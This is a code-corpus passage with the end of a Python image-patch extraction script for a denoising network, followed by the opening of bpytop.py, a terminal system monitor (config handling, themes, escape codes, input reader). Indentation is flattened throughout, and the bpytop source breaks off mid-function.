name = "n" + str(count).zfill(7) + ".tiff"
Image.fromarray(patches_n[j]).save(Noisy_out + name)
count += 1
random_state += 1
pbar.update(1)
pbar.close()
def get_file_list(dir):
"""Get List of files from directory
Input: DIR, directory to retrieve content from
Return: filename_list, list of contents filename, sorted by sorted()
"""
if not os.path.exists(dir):
raise IOError("%s does not exsit." % dir)
filename_list = []
for root, _ , files in os.walk(dir):
files = sorted(files)
for f in files:
filename_list.append(root + f)
return filename_list
def main(args):
Noisy_dir = args.Noisy_dir
Clean_dir = args.Clean_dir
Noisy_output = args.Noisy_output
Clean_output = args.Clean_output
ox = args.offset_x
oy = args.offset_y
if not os.path.exists(Noisy_output):
print ("Creating ", Noisy_output)
os.mkdir(Noisy_output)
if not os.path.exists(Clean_output):
print ("Creating ", Clean_output)
os.mkdir(Clean_output)
ppi = args.Patches_per_image
pw = args.Patch_width
Noisy_List = get_file_list(Noisy_dir)
Clean_List = get_file_list(Clean_dir)
extract_patches_multi(Noisy_List, Clean_List, Noisy_output, Clean_output, ppi, (pw, pw), ox, oy)
# extract_patches(Noisy_List, Clean_List, Noisy_output, Clean_output, ppi, (pw, pw), ox, oy)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description = "Helper function to extract patches for deepdenoisenet")
parser.add_argument('Noisy_dir', type = str, help = "Directory for your noisy images")
parser.add_argument('Clean_dir', type = str, help = "Directory for your reference clean images")
parser.add_argument('--Noisy_output', '-no', type = str, help = "Directory to output noisy patches", default = "./Images/NoisyPatches/")
parser.add_argument('--Clean_output', '-co', type = str, help = "Directory to output clean patches", default = "./Images/CleanPatches/")
parser.add_argument('--Patches_per_image', '-ppi', type = int, help = "Patches to extract per image", default = 10)
parser.add_argument('--Patch_width', '-pw', type = int, help = "Width of patch, which is square", default = 128)
parser.add_argument('--offset_x', '-ox', type = int, help = "x offset to align mosaic", default = 0)
parser.add_argument('--offset_y', '-oy', type = int, help = "y offset to align mosaic", default = 0)
args = parser.parse_args()
main(args)
|
bpytop.py
|
#!/usr/bin/env python3
# pylint: disable=not-callable, no-member
# indent = tab
# tab-size = 4
# Copyright 2020 Aristocratos (jakob@qvantnet.com)
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os, sys, threading, signal, re, subprocess, logging, logging.handlers, argparse
import urllib.request
from time import time, sleep, strftime, localtime
from datetime import timedelta
from _thread import interrupt_main
from collections import defaultdict
from select import select
from distutils.util import strtobool
from string import Template
from math import ceil, floor
from random import randint
from shutil import which
from typing import List, Set, Dict, Tuple, Optional, Union, Any, Callable, ContextManager, Iterable, Type, NamedTuple
errors: List[str] = []
try: import fcntl, termios, tty
except Exception as e: errors.append(f'{e}')
try: import psutil # type: ignore
except Exception as e: errors.append(f'{e}')
SELF_START = time()
SYSTEM: str
if "linux" in sys.platform: SYSTEM = "Linux"
elif "bsd" in sys.platform: SYSTEM = "BSD"
elif "darwin" in sys.platform: SYSTEM = "MacOS"
else: SYSTEM = "Other"
if errors:
print ("ERROR!")
for error in errors:
print(error)
if SYSTEM == "Other":
print("\nUnsupported platform!\n")
else:
print("\nInstall required modules!\n")
raise SystemExit(1)
VERSION: str = "1.0.33"
#? Argument parser ------------------------------------------------------------------------------->
args = argparse.ArgumentParser()
args.add_argument("-f" , "--full" ,action="store_true" ,help ="Start in full mode showing all boxes [default]")
args.add_argument("-p" , "--proc" ,action="store_true" ,help ="Start in minimal mode without memory and net boxes")
args.add_argument("-s" , "--stat" ,action="store_true" ,help ="Start in minimal mode without process box")
args.add_argument("-v" , "--version" ,action="store_true" ,help ="Show version info and exit")
args.add_argument("--debug" ,action="store_true" ,help ="Start with loglevel set to DEBUG overriding value set in config")
stdargs = args.parse_args()
if stdargs.version:
print(f'bpytop version: {VERSION}\n'
f'psutil version: {".".join(str(x) for x in psutil.version_info)}')
raise SystemExit(0)
ARG_MODE: str = ""
if stdargs.full:
ARG_MODE = "full"
elif stdargs.proc:
ARG_MODE = "proc"
elif stdargs.stat:
ARG_MODE = "stat"
if stdargs.debug:
DEBUG = True
else:
DEBUG = False
#? Variables ------------------------------------------------------------------------------------->
BANNER_SRC: List[Tuple[str, str, str]] = [
("#ffa50a", "#0fd7ff", "██████╗ ██████╗ ██╗ ██╗████████╗ ██████╗ ██████╗"),
("#f09800", "#00bfe6", "██╔══██╗██╔══██╗╚██╗ ██╔╝╚══██╔══╝██╔═══██╗██╔══██╗"),
("#db8b00", "#00a6c7", "██████╔╝██████╔╝ ╚████╔╝ ██║ ██║ ██║██████╔╝"),
("#c27b00", "#008ca8", "██╔══██╗██╔═══╝ ╚██╔╝ ██║ ██║ ██║██╔═══╝ "),
("#a86b00", "#006e85", "██████╔╝██║ ██║ ██║ ╚██████╔╝██║"),
("#000000", "#000000", "╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝"),
]
#*?This is the template used to create the config file
DEFAULT_CONF: Template = Template(f'#? Config file for bpytop v. {VERSION}' + '''
#* Color theme, looks for a .theme file in "/usr/[local/]share/bpytop/themes" and "~/.config/bpytop/themes", "Default" for builtin default theme.
#* Prefix name by a plus sign (+) for a theme located in user themes folder, i.e. color_theme="+monokai"
color_theme="$color_theme"
#* If the theme set background should be shown, set to False if you want terminal background transparency
theme_background=$theme_background
#* Set bpytop view mode, "full" for everything shown, "proc" for cpu stats and processes, "stat" for cpu, mem, disks and net stats shown.
view_mode=$view_mode
#* Update time in milliseconds, increases automatically if set below internal loops processing time, recommended 2000 ms or above for better sample times for graphs.
update_ms=$update_ms
#* Processes sorting, "pid" "program" "arguments" "threads" "user" "memory" "cpu lazy" "cpu responsive",
#* "cpu lazy" updates top process over time, "cpu responsive" updates top process directly.
proc_sorting="$proc_sorting"
#* Reverse sorting order, True or False.
proc_reversed=$proc_reversed
#* Show processes as a tree
proc_tree=$proc_tree
#* Which depth the tree view should auto collapse processes at
tree_depth=$tree_depth
#* Use the cpu graph colors in the process list.
proc_colors=$proc_colors
#* Use a darkening gradient in the process list.
proc_gradient=$proc_gradient
#* If process cpu usage should be of the core it's running on or usage of the total available cpu power.
proc_per_core=$proc_per_core
#* Show process memory as bytes instead of percent
proc_mem_bytes=$proc_mem_bytes
#* Check cpu temperature, needs "osx-cpu-temp" on MacOS X.
check_temp=$check_temp
#* Draw a clock at top of screen, formatting according to strftime, empty string to disable.
draw_clock="$draw_clock"
#* Update main ui in background when menus are showing, set this to false if the menus is flickering too much for comfort.
background_update=$background_update
#* Custom cpu model name, empty string to disable.
custom_cpu_name="$custom_cpu_name"
#* Optional filter for shown disks, should be last folder in path of a mountpoint, "root" replaces "/", separate multiple values with comma.
#* Begin line with "exclude=" to change to exclude filter, oterwise defaults to "most include" filter. Example: disks_filter="exclude=boot, home"
disks_filter="$disks_filter"
#* Show graphs instead of meters for memory values.
mem_graphs=$mem_graphs
#* If swap memory should be shown in memory box.
show_swap=$show_swap
#* Show swap as a disk, ignores show_swap value above, inserts itself after first disk.
swap_disk=$swap_disk
#* If mem box should be split to also show disks info.
show_disks=$show_disks
#* Set fixed values for network graphs, default "10M" = 10 Mibibytes, possible units "K", "M", "G", append with "bit" for bits instead of bytes, i.e "100mbit"
net_download="$net_download"
net_upload="$net_upload"
#* Start in network graphs auto rescaling mode, ignores any values set above and rescales down to 10 Kibibytes at the lowest.
net_auto=$net_auto
#* Sync the scaling for download and upload to whichever currently has the highest scale
net_sync=$net_sync
#* If the network graphs color gradient should scale to bandwith usage or auto scale, bandwith usage is based on "net_download" and "net_upload" values
net_color_fixed=$net_color_fixed
#* Show battery stats in top right if battery is present
show_battery=$show_battery
#* Show init screen at startup, the init screen is purely cosmetical
show_init=$show_init
#* Enable check for new version from github.com/aristocratos/bpytop at start.
update_check=$update_check
#* Set loglevel for "~/.config/bpytop/error.log" levels are: "ERROR" "WARNING" "INFO" "DEBUG".
#* The level set includes all lower levels, i.e. "DEBUG" will show all logging info.
log_level=$log_level
''')
CONFIG_DIR: str = f'{os.path.expanduser("~")}/.config/bpytop'
if not os.path.isdir(CONFIG_DIR):
try:
os.makedirs(CONFIG_DIR)
os.mkdir(f'{CONFIG_DIR}/themes')
except PermissionError:
print(f'ERROR!\nNo permission to write to "{CONFIG_DIR}" directory!')
raise SystemExit(1)
CONFIG_FILE: str = f'{CONFIG_DIR}/bpytop.conf'
THEME_DIR: str = ""
if os.path.isdir(f'{os.path.dirname(__file__)}/bpytop-themes'):
THEME_DIR = f'{os.path.dirname(__file__)}/bpytop-themes'
else:
for td in ["/usr/local/", "/usr/", "/snap/bpytop/current/usr/"]:
if os.path.isdir(f'{td}share/bpytop/themes'):
THEME_DIR = f'{td}share/bpytop/themes'
break
USER_THEME_DIR: str = f'{CONFIG_DIR}/themes'
CORES: int = psutil.cpu_count(logical=False) or 1
THREADS: int = psutil.cpu_count(logical=True) or 1
THREAD_ERROR: int = 0
DEFAULT_THEME: Dict[str, str] = {
"main_bg" : "",
"main_fg" : "#cc",
"title" : "#ee",
"hi_fg" : "#969696",
"selected_bg" : "#7e2626",
"selected_fg" : "#ee",
"inactive_fg" : "#40",
"graph_text" : "#60",
"meter_bg" : "#40",
"proc_misc" : "#0de756",
"cpu_box" : "#3d7b46",
"mem_box" : "#8a882e",
"net_box" : "#423ba5",
"proc_box" : "#923535",
"div_line" : "#30",
"temp_start" : "#4897d4",
"temp_mid" : "#5474e8",
"temp_end" : "#ff40b6",
"cpu_start" : "#50f095",
"cpu_mid" : "#f2e266",
"cpu_end" : "#fa1e1e",
"free_start" : "#223014",
"free_mid" : "#b5e685",
"free_end" : "#dcff85",
"cached_start" : "#0b1a29",
"cached_mid" : "#74e6fc",
"cached_end" : "#26c5ff",
"available_start" : "#292107",
"available_mid" : "#ffd77a",
"available_end" : "#ffb814",
"used_start" : "#3b1f1c",
"used_mid" : "#d9626d",
"used_end" : "#ff4769",
"download_start" : "#231a63",
"download_mid" : "#4f43a3",
"download_end" : "#b0a9de",
"upload_start" : "#510554",
"upload_mid" : "#7d4180",
"upload_end" : "#dcafde",
"process_start" : "#80d0a3",
"process_mid" : "#dcd179",
"process_end" : "#d45454",
}
MENUS: Dict[str, Dict[str, Tuple[str, ...]]] = {
"options" : {
"normal" : (
"┌─┐┌─┐┌┬┐┬┌─┐┌┐┌┌─┐",
"│ │├─┘ │ ││ ││││└─┐",
"└─┘┴ ┴ ┴└─┘┘└┘└─┘"),
"selected" : (
"╔═╗╔═╗╔╦╗╦╔═╗╔╗╔╔═╗",
"║ ║╠═╝ ║ ║║ ║║║║╚═╗",
"╚═╝╩ ╩ ╩╚═╝╝╚╝╚═╝") },
"help" : {
"normal" : (
"┬ ┬┌─┐┬ ┌─┐",
"├─┤├┤ │ ├─┘",
"┴ ┴└─┘┴─┘┴ "),
"selected" : (
"╦ ╦╔═╗╦ ╔═╗",
"╠═╣║╣ ║ ╠═╝",
"╩ ╩╚═╝╩═╝╩ ") },
"quit" : {
"normal" : (
"┌─┐ ┬ ┬ ┬┌┬┐",
"│─┼┐│ │ │ │ ",
"└─┘└└─┘ ┴ ┴ "),
"selected" : (
"╔═╗ ╦ ╦ ╦╔╦╗ ",
"║═╬╗║ ║ ║ ║ ",
"╚═╝╚╚═╝ ╩ ╩ ") }
}
MENU_COLORS: Dict[str, Tuple[str, ...]] = {
"normal" : ("#0fd7ff", "#00bfe6", "#00a6c7", "#008ca8"),
"selected" : ("#ffa50a", "#f09800", "#db8b00", "#c27b00")
}
#? Units for floating_humanizer function
UNITS: Dict[str, Tuple[str, ...]] = {
"bit" : ("bit", "Kib", "Mib", "Gib", "Tib", "Pib", "Eib", "Zib", "Yib", "Bib", "GEb"),
"byte" : ("Byte", "KiB", "MiB", "GiB", "TiB", "PiB", "EiB", "ZiB", "YiB", "BiB", "GEB")
}
#? Setup error logger ---------------------------------------------------------------->
try:
errlog = logging.getLogger("ErrorLogger")
errlog.setLevel(logging.DEBUG)
eh = logging.handlers.RotatingFileHandler(f'{CONFIG_DIR}/error.log', maxBytes=1048576, backupCount=4)
eh.setLevel(logging.DEBUG)
eh.setFormatter(logging.Formatter("%(asctime)s | %(levelname)s: %(message)s", datefmt="%d/%m/%y (%X)"))
errlog.addHandler(eh)
except PermissionError:
print(f'ERROR!\nNo permission to write to "{CONFIG_DIR}" directory!')
raise SystemExit(1)
#? Timers for testing and debugging -------------------------------------------------------------->
class TimeIt:
timers: Dict[str, float] = {}
paused: Dict[str, float] = {}
@classmethod
def start(cls, name):
cls.timers[name] = time()
@classmethod
def pause(cls, name):
if name in cls.timers:
cls.paused[name] = time() - cls.timers[name]
del cls.timers[name]
@classmethod
def stop(cls, name):
if name in cls.timers:
total: float = time() - cls.timers[name]
del cls.timers[name]
if name in cls.paused:
total += cls.paused[name]
del cls.paused[name]
errlog.debug(f'{name} completed in {total:.6f} seconds')
def timeit_decorator(func):
def timed(*args, **kw):
ts = time()
out = func(*args, **kw)
errlog.debug(f'{func.__name__} completed in {time() - ts:.6f} seconds')
return out
return timed
#? Set up config class and load config ----------------------------------------------------------->
class Config:
'''Holds all config variables and functions for loading from and saving to disk'''
keys: List[str] = ["color_theme", "update_ms", "proc_sorting", "proc_reversed", "proc_tree", "check_temp", "draw_clock", "background_update", "custom_cpu_name",
"proc_colors", "proc_gradient", "proc_per_core", "proc_mem_bytes", "disks_filter", "update_check", "log_level", "mem_graphs", "show_swap",
"swap_disk", "show_disks", "net_download", "net_upload", "net_auto", "net_color_fixed", "show_init", "view_mode", "theme_background",
"net_sync", "show_battery", "tree_depth"]
conf_dict: Dict[str, Union[str, int, bool]] = {}
color_theme: str = "Default"
theme_background: bool = True
update_ms: int = 2000
proc_sorting: str = "cpu lazy"
proc_reversed: bool = False
proc_tree: bool = False
tree_depth: int = 3
proc_colors: bool = True
proc_gradient: bool = True
proc_per_core: bool = False
proc_mem_bytes: bool = True
check_temp: bool = True
draw_clock: str = "%X"
background_update: bool = True
custom_cpu_name: str = ""
disks_filter: str = ""
update_check: bool = True
mem_graphs: bool = True
show_swap: bool = True
swap_disk: bool = True
show_disks: bool = True
net_download: str = "10M"
net_upload: str = "10M"
net_color_fixed: bool = False
net_auto: bool = True
net_sync: bool = False
show_battery: bool = True
show_init: bool = True
view_mode: str = "full"
log_level: str = "WARNING"
warnings: List[str] = []
info: List[str] = []
sorting_options: List[str] = ["pid", "program", "arguments", "threads", "user", "memory", "cpu lazy", "cpu responsive"]
log_levels: List[str] = ["ERROR", "WARNING", "INFO", "DEBUG"]
view_modes: List[str] = ["full", "proc", "stat"]
changed: bool = False
recreate: bool = False
config_file: str = ""
_initialized: bool = False
def __init__(self, path: str):
self.config_file = path
conf: Dict[str, Union[str, int, bool]] = self.load_config()
if not "version" in conf.keys():
self.recreate = True
self.info.append(f'Config file malformatted or missing, will be recreated on exit!')
elif conf["version"] != VERSION:
self.recreate = True
self.info.append(f'Config file version and bpytop version missmatch, will be recreated on exit!')
for key in self.keys:
if key in conf.keys() and conf[key] != "_error_":
setattr(self, key, conf[key])
else:
self.recreate = True
self.conf_dict[key] = getattr(self, key)
self._initialized = True
def __setattr__(self, name, value):
if self._initialized:
object.__setattr__(self, "changed", True)
object.__setattr__(self, name, value)
if name not in ["_initialized", "recreate", "changed"]:
self.conf_dict[name] = value
def load_config(self) -> Dict[str, Union[str, int, bool]]:
'''Load config from file, set correct types for values and return a dict'''
new_config: Dict[str,Union[str, int, bool]] = {}
conf_file: str = ""
if os.path.isfile(self.config_file):
conf_file = self.config_file
elif os.path.isfile("/etc/bpytop.conf"):
conf_file = "/etc/bpytop.conf"
else:
return new_config
try:
with open(conf_file, "r") as f:
for line in f:
line = line.strip()
if line.startswith("#? Config"):
new_config["version"] = line[line.find("v. ") + 3:]
for key in self.keys:
if line.startswith(key):
line = line.replace(key + "=", "")
if line.startswith('"'):
line = line.strip('"')
if type(getattr(self, key)) == int:
try:
new_config[key] = int(line)
except ValueError:
self.warnings.append(f'Config key "{key}" should be an integer!')
if type(getattr(self, key)) == bool:
try:
new_config[key] = bool(strtobool(line))
except ValueError:
self.warnings.append(f'Config key "{key}" can only be True or False!')
if type(getattr(self, key)) == str:
new_config[key] = str(line)
except Exception as e:
errlog.exception(str(e))
if "proc_sorting" in new_config and not new_config["proc_sorting"] in self.sorting_options:
new_config["proc_sorting"] = "_error_"
self.warnings.append(f'Config key "proc_sorted" didn\'t get an acceptable value!')
if "log_level" in new_config and not new_config["log_level"] in self.log_levels:
new_config["log_level"] = "_error_"
self.warnings.append(f'Config key "log_level" didn\'t get an acceptable value!')
if "view_mode" in new_config and not new_config["view_mode"] in self.view_modes:
new_config["view_mode"] = "_error_"
self.warnings.append(f'Config key "view_mode" didn\'t get an acceptable value!')
if isinstance(new_config["update_ms"], int) and new_config["update_ms"] < 100:
new_config["update_ms"] = 100
self.warnings.append(f'Config key "update_ms" can\'t be lower than 100!')
for net_name in ["net_download", "net_upload"]:
if net_name in new_config and not new_config[net_name][0].isdigit(): # type: ignore
new_config[net_name] = "_error_"
return new_config
def save_config(self):
'''Save current config to config file if difference in values or version, creates a new file if not found'''
if not self.changed and not self.recreate: return
try:
with open(self.config_file, "w" if os.path.isfile(self.config_file) else "x") as f:
f.write(DEFAULT_CONF.substitute(self.conf_dict))
except Exception as e:
errlog.exception(str(e))
try:
CONFIG: Config = Config(CONFIG_FILE)
if DEBUG:
errlog.setLevel(logging.DEBUG)
else:
errlog.setLevel(getattr(logging, CONFIG.log_level))
if CONFIG.log_level == "DEBUG": DEBUG = True
errlog.info(f'New instance of bpytop version {VERSION} started with pid {os.getpid()}')
errlog.info(f'Loglevel set to {"DEBUG" if DEBUG else CONFIG.log_level}')
errlog.debug(f'Using psutil version {".".join(str(x) for x in psutil.version_info)}')
errlog.debug(f'CMD: {" ".join(sys.argv)}')
if CONFIG.info:
for info in CONFIG.info:
errlog.info(info)
CONFIG.info = []
if CONFIG.warnings:
for warning in CONFIG.warnings:
errlog.warning(warning)
CONFIG.warnings = []
except Exception as e:
errlog.exception(f'{e}')
raise SystemExit(1)
if psutil.version_info[0] < 5 or (psutil.version_info[0] == 5 and psutil.version_info[1] < 7):
warn = f'psutil version {".".join(str(x) for x in psutil.version_info)} detected, version 5.7.0 or later required for full functionality!'
print("WARNING!", warn)
errlog.warning(warn)
#? Classes --------------------------------------------------------------------------------------->
class Term:
"""Terminal info and commands"""
width: int = 0
height: int = 0
resized: bool = False
_w : int = 0
_h : int = 0
fg: str = "" #* Default foreground color
bg: str = "" #* Default background color
hide_cursor = "\033[?25l" #* Hide terminal cursor
show_cursor = "\033[?25h" #* Show terminal cursor
alt_screen = "\033[?1049h" #* Switch to alternate screen
normal_screen = "\033[?1049l" #* Switch to normal screen
clear = "\033[2J\033[0;0f" #* Clear screen and set cursor to position 0,0
mouse_on = "\033[?1002h\033[?1015h\033[?1006h" #* Enable reporting of mouse position on click and release
mouse_off = "\033[?1002l" #* Disable mouse reporting
mouse_direct_on = "\033[?1003h" #* Enable reporting of mouse position at any movement
mouse_direct_off = "\033[?1003l" #* Disable direct mouse reporting
winch = threading.Event()
@classmethod
def refresh(cls, *args, force: bool = False):
"""Update width, height and set resized flag if terminal has been resized"""
if cls.resized: cls.winch.set(); return
cls._w, cls._h = os.get_terminal_size()
if (cls._w, cls._h) == (cls.width, cls.height) and not force: return
if force: Collector.collect_interrupt = True
while (cls._w, cls._h) != (cls.width, cls.height) or (cls._w < 80 or cls._h < 24):
if Init.running: Init.resized = True
CpuBox.clock_block = True
cls.resized = True
Collector.collect_interrupt = True
cls.width, cls.height = cls._w, cls._h
Draw.now(Term.clear)
Draw.now(f'{create_box(cls._w // 2 - 25, cls._h // 2 - 2, 50, 3, "resizing", line_color=Colors.green, title_color=Colors.white)}',
f'{Mv.r(12)}{Colors.default}{Colors.black_bg}{Fx.b}Width : {cls._w} Height: {cls._h}{Fx.ub}{Term.bg}{Term.fg}')
if cls._w < 80 or cls._h < 24:
while cls._w < 80 or cls._h < 24:
Draw.now(Term.clear)
Draw.now(f'{create_box(cls._w // 2 - 25, cls._h // 2 - 2, 50, 4, "warning", line_color=Colors.red, title_color=Colors.white)}',
f'{Mv.r(12)}{Colors.default}{Colors.black_bg}{Fx.b}Width: {Colors.red if cls._w < 80 else Colors.green}{cls._w} ',
f'{Colors.default}Height: {Colors.red if cls._h < 24 else Colors.green}{cls._h}{Term.bg}{Term.fg}',
f'{Mv.to(cls._h // 2, cls._w // 2 - 23)}{Colors.default}{Colors.black_bg}Width and Height needs to be at least 80 x 24 !{Fx.ub}{Term.bg}{Term.fg}')
cls.winch.wait(0.3)
cls.winch.clear()
cls._w, cls._h = os.get_terminal_size()
else:
cls.winch.wait(0.3)
cls.winch.clear()
cls._w, cls._h = os.get_terminal_size()
Key.mouse = {}
Box.calc_sizes()
if Init.running: cls.resized = False; return
if Menu.active: Menu.resized = True
Box.draw_bg(now=False)
cls.resized = False
Timer.finish()
@staticmethod
def echo(on: bool):
"""Toggle input echo"""
(iflag, oflag, cflag, lflag, ispeed, ospeed, cc) = termios.tcgetattr(sys.stdin.fileno())
if on:
lflag |= termios.ECHO # type: ignore
else:
lflag &= ~termios.ECHO # type: ignore
new_attr = [iflag, oflag, cflag, lflag, ispeed, ospeed, cc]
termios.tcsetattr(sys.stdin.fileno(), termios.TCSANOW, new_attr)
@staticmethod
def title(text: str = "") -> str:
if text: text = f' {text}'
return f'\033]0;{os.environ.get("TERMINAL_TITLE", "")}{text}\a'
class Fx:
"""Text effects
* trans(string: str): Replace whitespace with escape move right to not overwrite background behind whitespace.
* uncolor(string: str) : Removes all 24-bit color and returns string ."""
start = "\033[" #* Escape sequence start
sep = ";" #* Escape sequence separator
end = "m" #* Escape sequence end
reset = rs = "\033[0m" #* Reset foreground/background color and text effects
bold = b = "\033[1m" #* Bold on
unbold = ub = "\033[22m" #* Bold off
dark = d = "\033[2m" #* Dark on
undark = ud = "\033[22m" #* Dark off
italic = i = "\033[3m" #* Italic on
unitalic = ui = "\033[23m" #* Italic off
underline = u = "\033[4m" #* Underline on
ununderline = uu = "\033[24m" #* Underline off
blink = bl = "\033[5m" #* Blink on
unblink = ubl = "\033[25m" #* Blink off
strike = s = "\033[9m" #* Strike / crossed-out on
unstrike = us = "\033[29m" #* Strike / crossed-out off
#* Precompiled regex for finding a 24-bit color escape sequence in a string
color_re = re.compile(r"\033\[\d+;\d?;?\d*;?\d*;?\d*m")
@staticmethod
def trans(string: str):
return string.replace(" ", "\033[1C")
@classmethod
def uncolor(cls, string: str) -> str:
return f'{cls.color_re.sub("", string)}'
class Raw(object):
"""Set raw input mode for device"""
def __init__(self, stream):
self.stream = stream
self.fd = self.stream.fileno()
def __enter__(self):
self.original_stty = termios.tcgetattr(self.stream)
tty.setcbreak(self.stream)
def __exit__(self, type, value, traceback):
termios.tcsetattr(self.stream, termios.TCSANOW, self.original_stty)
class Nonblocking(object):
"""Set nonblocking mode for device"""
def __init__(self, stream):
self.stream = stream
self.fd = self.stream.fileno()
def __enter__(self):
self.orig_fl = fcntl.fcntl(self.fd, fcntl.F_GETFL)
fcntl.fcntl(self.fd, fcntl.F_SETFL, self.orig_fl | os.O_NONBLOCK)
def __exit__(self, *args):
fcntl.fcntl(self.fd, fcntl.F_SETFL, self.orig_fl)
class Mv:
"""Class with collection of cursor movement functions: .t[o](line, column) | .r[ight](columns) | .l[eft](columns) | .u[p](lines) | .d[own](lines) | .save() | .restore()"""
@staticmethod
def to(line: int, col: int) -> str:
return f'\033[{line};{col}f' #* Move cursor to line, column
@staticmethod
def right(x: int) -> str: #* Move cursor right x columns
return f'\033[{x}C'
@staticmethod
def left(x: int) -> str: #* Move cursor left x columns
return f'\033[{x}D'
@staticmethod
def up(x: int) -> str: #* Move cursor up x lines
return f'\033[{x}A'
@staticmethod
def down(x: int) -> str: #* Move cursor down x lines
return f'\033[{x}B'
save: str = "\033[s" #* Save cursor position
restore: str = "\033[u" #* Restore saved cursor postion
t = to
r = right
l = left
u = up
d = down
class Key:
"""Handles the threaded input reader for keypresses and mouse events"""
list: List[str] = []
mouse: Dict[str, List[List[int]]] = {}
mouse_pos: Tuple[int, int] = (0, 0)
escape: Dict[Union[str, Tuple[str, str]], str] = {
"\n" : "enter",
("\x7f", "\x08") : "backspace",
("[A", "OA") : "up",
("[B", "OB") : "down",
("[D", "OD") : "left",
("[C", "OC") : "right",
"[2~" : "insert",
"[3~" : "delete",
"[H" : "home",
"[F" : "end",
"[5~" : "page_up",
"[6~" : "page_down",
"\t" : "tab",
"[Z" : "shift_tab",
"OP" : "f1",
"OQ" : "f2",
"OR" : "f3",
"OS" : "f4",
"[15" : "f5",
"[17" : "f6",
"[18" : "f7",
"[19" : "f8",
"[20" : "f9",
"[21" : "f10",
"[23" : "f11",
"[24" : "f12"
}
new = threading.Event()
idle = threading.Event()
mouse_move = threading.Event()
mouse_report: bool = False
idle.set()
stopping: bool = False
started: bool = False
reader: threading.Thread
@classmethod
def start(cls):
cls.stopping = False
cls.reader = threading.Thread(target=cls._get_key)
cls.reader.start()
cls.started = True
@classmethod
def stop(cls):
if cls.started and cls.reader.is_alive():
cls.stopping = True
try:
cls.reader.join()
except:
pass
@classmethod
def last(cls) -> str:
if cls.list: return cls.list.pop()
else: return ""
@classmethod
def get(cls) -> str:
if cls.list: return cls.list.pop(0)
else: return ""
@classmethod
def get_mouse(cls) -> Tuple[int, int]:
if cls.new.is_set():
cls.new.clear()
return cls.mouse_pos
@classmethod
def mouse_moved(cls) -> bool:
if cls.mouse_move.is_set():
cls.mouse_move.clear()
return True
else:
return False
@classmethod
def has_key(cls) -> bool:
if cls.list: return True
else: return False
@classmethod
def clear(cls):
cls.list = []
@classmethod
def input_wait(cls, sec: float = 0.0, mouse: bool = False) -> bool:
'''Returns True if key is detected else waits out timer and returns False'''
if cls.list: return True
if mouse: Draw.now(Term.mouse_direct_on)
cls.new.wait(sec if sec > 0 else 0.0)
if mouse: Draw.now(Term.mouse_direct_off, Term.mouse_on)
if cls.new.is_set():
cls.new.clear()
return True
else:
return False
@classmethod
def break_wait(cls):
cls.list.append("_null")
cls.new.set()
sleep(0.01)
cls.new.clear()
@classmethod
def _get_key(cls):
"""Get a key or escape sequence from stdin, convert to readable format and save to keys list. Meant to be run in it's own thread."""
input_key: str = ""
clean_key: str = ""
try:
while not cls.stopping:
with Raw(sys.stdin):
if not select([sys.stdin], [], [], 0.1)[0]: #* Wait 100ms for input on stdin then restart loop to check for stop flag
continue
input_key += sys.stdin.read(1) #* Read 1 key safely with blocking on
if input_key == "\033": #* If first character is a escape sequence keep reading
cls.idle.clear() #* Report IO block in progress to prevent Draw functions from getting a IO Block error
Draw.idle.wait() #* Wait for Draw function to finish if busy
with Nonblocking(sys.stdin): #* Set non blocking to prevent read stall
input_key += sys.stdin.read(20)
if input_key.startswith("\033[<"):
_ = sys.stdin.read(1000)
cls.idle.set() #* Report IO blocking done
#errlog.debug(f'{repr(input_key)}')
if input_key == "\033": clean_key = "escape" #* Key is "escape" key if only containing \033
elif input_key.startswith(("\033[<0;", "\033[<35;", "\033[<64;", "\033[<65;")): #* Detected mouse event
try:
cls.mouse_pos = (int(input_key.split(";")[1]), int(input_key.split(";")[2].rstrip("mM")))
except:
pass
else:
if input_key.startswith("\033[<35;"): #* Detected mouse move in mouse direct mode
cls.mouse_move.set()
cls.new.set()
elif input_key.startswith("\033[<64;"): #* Detected mouse scroll up
clean_key = "mouse_scroll_up"
elif input_key.startswith("\033[<65;"): #* Detected mouse scroll down
clean_key = "mouse_scroll_down"
elif input_key.startswith("\033[<0;") and input_key.endswith("m"): #* Detected mouse click release
if Menu.active:
clean_key = "mouse_click"
else:
for key_name, positions in cls.mouse.items(): #* Check if mouse position is clickable
if list(cls.mouse_pos) in positions:
clean_key = key_name
break
else:
clean_key = "mouse_click"
elif input_key == "\\": clean_key = "\\" #* Clean up "\" to not return escaped
else:
for code in cls.escape.keys(): #* Go trough dict of escape codes to get the cleaned key name
if input_key.lstrip("\033").startswith(code):
clean_key = cls.escape[code]
break
else: #* If not found in escape dict and length of key is 1, assume regular character
if len(input_key) == 1:
clean_key = input_key
if clean_key:
cls.list.append(clean_key) #* Store up to 10 keys in input queue for later processing
if len(cls.list) > 10: del cls.list[0]
clean_key = ""
cls.new.set() #* Set threading event to interrupt main thread sleep
input_key = ""
except Exception as e:
errlog.exception(f'Input thread failed with exception: {e}')
cls.idle.set()
cls.list.clear()
clean_quit(1, thread=True)
class Draw:
'''Holds the draw buffer and manages IO blocking queue
* .buffer([+]name[!], *args, append=False, now=False, z=100) : Add *args to buffer
* - Adding "+" prefix to name sets append to True and appends to name's current string
* - Adding "!" suffix to name sets now to True and print name's current string
* .out(clear=False) : Print all strings in buffer, clear=True clear all buffers after
* .now(*args) : Prints all arguments as a string
* .clear(*names) : Clear named buffers, all if no argument
* .last_screen() : Prints all saved buffers
'''
strings: Dict[str, str] = {}
z_order: Dict[str, int] = {}
saved: Dict[str, str] = {}
save: Dict[str, bool] = {}
once: Dict[str, bool] = {}
idle = threading.Event()
idle.set()
@classmethod
def now(cls, *args):
'''Wait for input reader and self to be idle then print to screen'''
Key.idle.wait()
cls.idle.wait()
cls.idle.clear()
try:
print(*args, sep="", end="", flush=True)
except BlockingIOError:
pass
Key.idle.wait()
print(*args, sep="", end="", flush=True)
cls.idle.set()
@classmethod
def buffer(cls, name: str, *args: str, append: bool = False, now: bool = False, z: int = 100, only_save: bool = False, no_save: bool = False, once: bool = False):
string: str = ""
if name.startswith("+"):
